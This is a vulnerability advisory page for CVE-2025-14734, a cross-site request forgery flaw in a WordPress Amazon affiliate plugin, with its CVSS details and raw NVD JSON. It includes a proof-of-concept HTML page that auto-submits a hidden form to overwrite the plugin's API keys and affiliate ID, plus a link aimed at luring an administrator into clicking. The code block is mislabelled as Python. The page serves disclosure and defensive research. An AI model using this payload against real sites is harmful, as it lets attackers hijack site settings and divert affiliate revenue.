Security Vulnerability Report
中文
CVE-2025-14734 CVSS 5.4 MEDIUM

CVE-2025-14734

Published: 2025-12-20 04:16:08
Last Modified: 2026-04-15 00:35:42

Description

The Amazon affiliate lite Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'ADAL_settings_page' function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Amazon affiliate lite Plugin <= 1.0.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14734 --> <!--诱骗已登录的管理员访问此页面--> <html> <body> <h1>CVE-2025-14734 CSRF PoC</h1> <p>Amazon affiliate lite Plugin < = 1.0.0</p> <form action="http://target-site/wp-admin/admin.php?page=ADAL_settings_page" method="POST" id="csrfForm"> <!-- 隐藏的表单字段,模拟设置更新请求 --> <input type="hidden" name="action" value="update"> <input type="hidden" name="ADAL_amazon_api_key" value="malicious_api_key"> <input type="hidden" name="ADAL_amazon_secret_key" value="malicious_secret"> <input type="hidden" name="ADAL_affiliate_id" value="attackers_affiliate_id"> <input type="hidden" name="ADAL_settings_nonce" value="fake_nonce"> </form> <script> // 自动提交表单 document.getElementById('csrfForm').submit(); </script> <p>或者使用以下链接(需管理员点击):</p> <a href="http://target-site/wp-admin/admin.php?page=ADAL_settings_page&action=update&ADAL_affiliate_id=attacker_id">点击查看详情</a> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14734", "sourceIdentifier": "[email protected]", "published": "2025-12-20T04:16:08.457", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Amazon affiliate lite Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'ADAL_settings_page' function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L99", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8175ff00-e588-46cf-a743-9c4d4717657a?source=cve", "source": "[email protected]"}]}}